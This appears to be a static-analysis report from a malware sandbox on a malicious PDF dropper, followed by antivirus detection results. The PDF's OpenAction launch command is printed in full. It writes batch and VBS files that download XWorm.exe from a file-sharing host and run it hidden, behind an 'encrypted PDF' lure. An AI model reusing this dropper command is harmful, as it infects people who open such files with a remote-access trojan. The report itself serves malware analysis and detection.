Static | ZeroBOX
No PDF metadata could be extracted!
%PDF-1.1
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
1 0 obj
/OpenAction <<
/S /Launch/Win
<<
/F (CMD) /P (/c cD %tEMP% &@echo powershell -Command "(New-Object Net.WebClient).DownloadFile('https://transfer.sh/get/1MeR2u/XWorm.exe', 'payload.exe')" >> msd89h2j389uh.bat &@echo timeout /t 5 >> msd89h2j389uh.bat &@echo start payload.exe >> msd89h2j389uh.bat &@echo Set oShell = CreateObject ("Wscript.Shell") >> encrypted.vbs &@echo Dim strArgs >> encrypted.vbs &@echo strArgs = "cmd /c msd89h2j389uh.bat" >> encrypted.vbs &@echo oShell.Run strArgs, 0, false >> encrypted.vbs & encrypted.vbs &dEl encrypted.vbs
PDF Encrypted. Please click)
/Pages 2 0 R
/Type /Catalog
endobj
2 0 obj
/Kids [ 3 0 R ]
/Count 1
/Type /Pages
endobj
3 0 obj
/Resources <<
/Font <<
/F1 5 0 R
/MediaBox [ 0 0 795 842 ]
/Parent 2 0 R
/Contents 4 0 R
/Type /Page
endobj
4 0 obj
/Length 1260
>>stream
endobj
5 0 obj
/Subtype /Type1
/Name /F1
/BaseFont /Helvetica
/Type /Font
endobj
0000000000 65535 f
0000000010 00000 n
0000000234 00000 n
0000000303 00000 n
0000000457 00000 n
0000001774 00000 n
trailer
/Size 6
/Root 1 0 R
/ID [ (bc38735adadf7620b13216ff40de2b26) (bc38735adadf7620b13216ff40de2b26) ]
startxref
1866%%EOF
Antivirus Signature
Bkav Clean
Lionic Clean
MicroWorld-eScan Heur.BZC.HEV.Pantera.53.CE4B189C
ClamAV Clean
FireEye Heur.BZC.HEV.Pantera.53.CE4B189C
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Clean
VIPRE Heur.BZC.HEV.Pantera.53.CE4B189C
Sangfor Exploit.Generic-Script.Save.0a46cc5b
K7AntiVirus Clean
K7GW Clean
Baidu Clean
VirIT Clean
Cyren Clean
Symantec Clean
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Clean
Cynet Clean
Kaspersky Clean
BitDefender Heur.BZC.HEV.Pantera.53.CE4B189C
NANO-Antivirus Clean
ViRobot Clean
Rising Clean
Emsisoft Exploit.PDF-Dropper.Gen (B)
F-Secure Clean
DrWeb Clean
Zillya Clean
TrendMicro HEUR_PDFEXP.D
McAfee-GW-Edition BehavesLike.PDF.Trojan.tx
CMC Clean
Sophos Clean
Ikarus Clean
GData Exploit.PDF-Dropper.Gen
Jiangmin Clean
Avira Clean
MAX malware (ai score=85)
Antiy-AVL Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Exploit.PDF-Dropper.Gen
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Clean
Google Clean
AhnLab-V3 Clean
Acronis Clean
ALYac Exploit.PDF-Dropper.Gen
TACHYON Clean
VBA32 Clean
Zoner Clean
Tencent Clean
Yandex Clean
SentinelOne Clean
MaxSecure Clean
Fortinet VBS/Pantera.6A942003!tr
BitDefenderTheta Clean
AVG Clean
Panda Clean
No IRMA results available.